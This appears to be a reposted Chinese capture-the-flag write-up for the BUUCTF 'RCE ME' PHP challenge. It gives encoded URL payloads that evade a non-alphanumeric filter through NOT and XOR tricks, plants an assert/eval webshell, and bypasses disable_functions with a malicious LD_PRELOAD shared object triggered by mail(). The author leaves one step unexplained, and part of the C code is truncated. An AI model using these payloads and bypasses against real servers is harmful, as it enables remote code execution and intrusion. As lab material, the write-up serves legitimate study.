BUUCTF:[极客大挑战 2019]RCE ME ——两种方法
![BUUCTF:[极客大挑战 2019]RCE ME ——两种方法](https://static.528045.com/imgs/23.jpg?imageMogr2/format/webp/blur/1x0/quality/35 "BUUCTF:[极客大挑战 2019]RCE ME ——两种方法")
BUUCTF:[极客大挑战 2019]RCE ME
打开环境是 代码审计题
error_reporting(0);if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long."); } if(preg_match("/[A-Za-z0-9]+/",$code)){ die("NO."); } @eval($code);}else{ highlight_file(__FILE__);}// ?>代码审计很简单
我们上传的payload中不能含有大小写字母和数字
我们可以使用 异或绕过 和url编码取反绕过绕过
具体可以参考文章:PHP代码执行中出现过滤限制的绕过执行方法
在本关,我们要先访问 phpinfo 来查找被禁用的函数,从而进一步来构造我们的payload
.
查询禁用函数
异或和url取反在任意php版本下均可使用,所以两种方法均可使用。
url编码取反绕过
url编码取反绕过 :就是我们将php代码url编码后取反,我们传入参数后服务端进行url解码,这时由于取反后,会url解码成不可打印字符,这样我们就会绕过。
即,对查询语句取反,然后编码。在编码前加上~进行取反,括号没有被过滤,不用取反。构造完的语句进行查询:
?code=(~%8F%97%8F%96%91%99%90)();异或饶过
异或:将两个字符的ascii转化为二进制 进行异或取值 从而得到新的二进制 转化为新的字符
eg:
字符:? ASCII码:63 二进制: 0011 1111
字符:~ ASCII码:126 二进制: 0111 1110
异或规则:
1 XOR 0 = 1
0 XOR 1 = 1
0 XOR 0 = 0
1 XOR 1 = 0
上述两个字符异或得到 二进制: 0100 0001
该二进制的十进制也就是:65
对应的ASCII码是:A
paylaod
?code=(%22%80%80%80%80%80%80%80%22^%22%f0%e8%f0%e9%ee%e6%ef%22)();
disable_functions禁用函数过多
.
构造脚本
error_reporting(0);$a='assert';$b=urlencode(~$a);echo $b;echo "
";$c='(eval($_POST[test]))';$d=urlencode(~$c);echo $d; ?>我们先使用上面的php脚本获取url编码取反
然后拼接为 assert(eval($_POST[test]))
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%8B%9A%8C%8B%DD%A2%D6%D6);在这里,我们不能直接使用eval 因为 eval并不是php函数 所以为我们无法通过变量函数的方法进行调用。
在这里,我们使用 assert 来构造,但由于php版本问题,我们并不能直接构造,我们需要调用eval
拼接为 assert(eval($_POST[test]))
assert 可以将整个字符串参数当作php参数执行,但在 php7版本中
assert ( mixed $assertion [, Throwable $exception ] ) : bool写不下去了…
有没有大佬解释下 感觉主要还是因为Throwable $exception不知道对不对…
用蚁剑连接
由于 disable_functions的存在我们不能说直接读取flag,需要借助readflag来读取
获取flag
在获取flag的时候我们也有两种方法 一种直接借助蚁剑中的插件进行绕过,一种是
借助蚁剑插件
/readflag
利用动态链接库—— LD_PRELOAD
因为 LD_PRELOAD允许我们在执行程序之前优先加载动态链接库。利用这个,我们就可以使用自己的函数,同时我们也可以向别人的程序注入恶意程序,从而达到我们的目的。
我们需要让我们编写的恶意elf文件优先启动我们书写的so文件访问即可获得flag
详细内容需要请关注这篇文章
突破思路:
- 创建新进程
- 用c编写我们的恶意代码,将其转化为 so文件
- 让我们的 so文件为LD_PRELOAD
- 让我们的 so文件优先加载
- 运行主体 php函数
做题步骤:
编写hack.c
#include getenv:获取环境变量的值
unsetenv:用来删除一个环境变量
system:定的命令名称或程序名称传给要被命令处理器执行的主机环境
payload 函数大概是说 查询 flag 并将flag返回到/var/tmp/文件夹下,flag返回形式为 test.php。
使用linux将我们的 .c 变为 so
gcc -shared -fPIC hack.c -o getflag.so
书写php文件
putenv("LD_PRELOAD=/var/tmp/getflag.so");mail("","","","");error_log("",1,"","");?>LD_PRELOAD=/var/tmp/getflag.so 意思是 LD_PRELOAD 是/var/tmp/文件夹下的 getflag.so 文件.
上传我们的 getflag.so 文件和 shell.php 文件
然后访问我们php文件即可(异或)
?code=${%fe%fe%fe%fe^%a1%b9%bb%aa}[_](${%fe%fe%fe%fe^%a1%b9%bb%aa}[__]);&_=assert&__=include(%27/var/tmp/shell.php%27)&cmd=/readflag&outpath=/tmp/tmpfile&sopath=/var/tmp/getflag.so之后到 var/tmp/文件下寻找test.php文件即可
来源地址:https://blog.csdn.net/m0_62879498/article/details/124803318
免责声明:
① 本站未注明“稿件来源”的信息均来自网络整理。其文字、图片和音视频稿件的所属权归原作者所有。本站收集整理出于非商业性的教育和科研之目的,并不意味着本站赞同其观点或证实其内容的真实性。仅作为临时的测试数据,供内部测试之用。本站并未授权任何人以任何方式主动获取本站任何信息。
② 本站未注明“稿件来源”的临时测试数据将在测试完成后最终做删除处理。有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
